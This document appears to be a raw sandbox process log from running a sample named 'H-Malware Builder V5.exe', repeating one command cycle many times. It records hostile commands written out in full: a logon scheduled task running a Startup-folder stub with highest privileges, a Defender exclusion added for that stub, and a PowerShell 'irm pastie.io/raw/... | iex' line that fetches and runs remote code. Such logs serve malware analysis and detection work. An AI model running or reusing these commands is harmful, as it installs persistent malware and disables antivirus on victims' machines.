"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6709464081603188433999079362-490326400938330376404741403446901449-173702388"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1548174283-16579753426474451619396139242094196912-139300579268471104-1024849926"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "787099995-1895992732-17501242335023151011073593136-2141236445-64923451859521277"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f6492548-2ff8-4852-9a5c-41886f5985b6}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1175545578-1778622751258649665783288742237941442-1743488075974933342-796245022"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6364561111443597361-1934135915394529519-14331789341941311772-12358763861197314135"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "337865877562856591478059300-9794222762547872341895301810-12145878271784283826"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{276047b5-b030-40c3-9e9b-380a43f94dc6}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1373922897-20552865959596000831363370225-827834822-12746480341546815333-2058198541"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1216478723-620470056-168809781042063912-367374261439362568-1925104962-898513992"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{393e59db-c344-45bd-8571-7dd851c16c20}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "531544789-1376330739356163519379377128-1031942380705341644289677108-766176334"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2012191197-489668545-335798726-1114887049-14468033681181819267850625655-1137832778"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{23d4804c-ac96-4f14-a84a-87f33f3c4ac7}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-118817501-15138212051449840465-1153820160-4757577721766783720807200337-1657643502"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15736218971705661223-15402644101156709177-7622167802059213303-1954685457-1826484396"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-600186781-696915314161643401-1465218360-293719074-1100429955651495922-203760398"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3dc2001e-57ee-4f5c-b2dd-fc568e216790}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2073837781576365561844206198-406157297-1382866802-2107875568746920632038625896"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1290659079252616349-2961061281814374316-1534923737-2023460904-1350926588-722363010"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a47334ca-0d0b-4891-9656-0dd4bfcea99a}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ce21aee7-1d89-4eef-84bd-badfba17dbab}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "28493053420195454316591388614737804961163365018-1556520737-1519912346152796347"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11158921061942171606-1876429976-340579860-140811390-501893000695079267-57575038"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c5421821-29dd-4439-aec6-f5ab701c15bd}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1592300802-1125090077412264604208253486515199969162075706307-1107652390-872347230"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1390621235-2140427527-3888400771306064596-683654599-1906422318-787327270-1105790730"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a8d63dd2-421c-413a-a6a9-bfc4c269e575}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-150182375320764138061181264458681198385-1357469059-290976817-1259594266296500123"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{8fad834c-35b8-441f-adcd-68a9d28dbe78}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "14217279-1523039658974102170-95682348-7596315617903086121696891047353540906"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "72463624747755532210150431792022494681278858142-12604900403696778-1921125488"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6ef01380-3628-4f71-b57e-0f40de2f174a}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-884051115985304638142863174-348513958-1694184333-10437108351841475425552380518"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-923882584-693518846-670877583850667607-199998555117473477853329393285397128"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f6f6bd04-a03b-4609-be57-a540e0b0e047}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1653429358158510995813923117101980780107752276129-15267719849259381711085534357"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1827e9f7-4bca-4ea5-b73b-d8c27d996bad}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-81321301-1381990823-2049100907819688463-8333658431126606083-817960600-648957999"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{30738389-e346-4a79-8682-b23677885125}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "59533561-255787318-209910757235908180-449314930-3957853946078229151681819539"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16617032261805336481-393615654-787539816-1490141643-194263445758277602774314460"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{8e388215-6a7a-4479-b844-9f7105d64966}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1611605839-966798651970194383-4921579631526728872-841368038-1440469844-1575009569"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19592581110329084441172179465-17210295024579207638564644451617213353-908248454"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{29f48b0f-940f-4f4a-a209-7b10543d63a5}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "521421593686314847-820088597-477860741417351813-1115424480-1582482051-1942205669"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "255603567675468979448715504-2093467767-1579274390-17850074631868351201-1887449639"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
